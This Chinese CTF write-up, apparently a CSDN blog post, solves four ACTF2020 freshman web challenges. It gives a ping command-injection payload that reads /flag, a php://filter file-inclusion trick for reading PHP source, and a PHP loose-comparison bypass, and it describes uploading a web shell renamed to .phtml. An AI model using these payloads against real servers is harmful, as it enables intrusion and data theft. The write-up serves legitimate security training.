[ACTF2020 新生赛]Web汇总

[ACTF2020 新生赛]Web汇总

Exec

ping命令注入

‘127.0.0.1;’’

没有回显

截断符号配合普通命令

发现没有任何屏蔽

payload:

127.0.0.1;cat /flag

拓展:https://blog.csdn.net/qq_41079177/article/details/88321816

Include

根据题目和询问可能是 本地文件包含

通过

php://filter/read=convert.base64-encode/resource=

查看flag.php源码

?file=php://filter/read=convert.base64encode/resource=index.php

得到index.php的base64源码 转换

<meta charset="utf8">
<?php
error_reporting(0);
$file =
$_GET["file"];
if(stristr($file,"php://input")
|| stristr($file,"zip://") || stristr($file,"phar://") ||
stristr($file,"data:")){
exit('hacker!');
}
if($file){
include($file);
}else{
echo '<ahref="?file=flag.php">tips</a>';
}
?>

访问 flag

http://url/?file=php://filter/read=convert.base64-encode/resource=flag.php

BackupFile

根据题目意思得到

http://url/index.php.bak

下载备份文件

<?php
include_once "flag.php";
if(isset($_GET['key'])) {
    $key = $_GET['key'];
    if(!is_numeric($key)) {
        exit("Just num!");
    }
    $key = intval($key);
    $str = "123ffwsfwefwf24r2f32ir23jrw923rskfjwtsw54w3";
    if($key == $str) {
        echo $flag;
    }
}
else {
    echo "Try to find out source file!";
}

http://url/?key=123ffwsfwefwf24r2f32ir23jrw923rskfjwtsw54w3

报错–Just num!

这里看了wp,查看手册才知道

if 后面的==是弱相等;

这里的字符型被转换成了整型

故?key=123即可

Upload

文件上传漏洞

随便上传一个东西

显示路径

上传一句话木马

抓包修改为phtml后缀

菜刀连接在根目录得到

  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值